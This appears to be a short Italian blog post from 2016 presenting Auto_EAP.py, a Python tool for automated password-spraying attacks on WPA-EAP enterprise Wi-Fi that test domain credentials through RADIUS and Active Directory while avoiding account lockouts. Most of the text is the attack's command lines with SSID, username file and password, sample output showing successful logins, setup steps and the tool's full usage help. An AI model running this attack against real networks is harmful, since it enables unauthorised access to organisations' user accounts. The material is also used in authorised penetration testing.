
Attacchi automatizzati di forza bruta ai login contro reti EAP.
######Pubblicato il 15 settembre 2016
Auto_EAP.py è uno script progettato per eseguire attacchi di autenticazione a forza bruta automatizzati contro vari tipi di reti EAP. Questi tipi di reti wireless forniscono un'interfaccia per facilitare l'indovinamento delle password delle credenziali di dominio, poiché i server RADIUS verificano l'autenticazione contro Active Directory. Utilizzando la libreria Python wpaspy, creata da Jouni Malinen [email protected] per interagire con il demone wpa_supplicant, è possibile eseguire attacchi di autenticazione automatizzati con l'intento di non causare blocchi degli account.
./Auto_EAP.py -s HoneyPot -K WPA-EAP -E PEAP -U test.txt -p Summer2016 -i wlan0
Initialized...
Trying Username Alice with Password test: SUCCESS
Trying Username Bob with Password test: FAILED
Trying Username Charles with Password test: FAILED
Trying Username David with Password test: SUCCESS
Completed
Esegui 'RunMeFirst.py' nella directory principale di Auto_EAP. Questo compilerà la libreria wpaspy e configurerà un file wpa_supplicant.conf autonomo che Auto_EAP.py utilizzerà per i test, lasciando inalterato il file di configurazione wpa_supplicant del sistema.
./Auto_EAP.py -h
usage: Auto_EAP.py [-h] -i Interface -s SSID -U Usernamefile -p Password -K
Key_mgmt -E Eap_type
optional arguments:
-h, --help show this help message and exit
-i Interface, --interface Interface
The Interface to use
-s SSID, --ssid SSID The SSID to attack
-U Usernamefile, --User Usernamefile
Path to username file
-p Password, --password Password
Password to use
-K Key_mgmt, --key_mgmt Key_mgmt
Key_Management type to use
-E Eap_type, --eap_type Eap_type
Eap type to use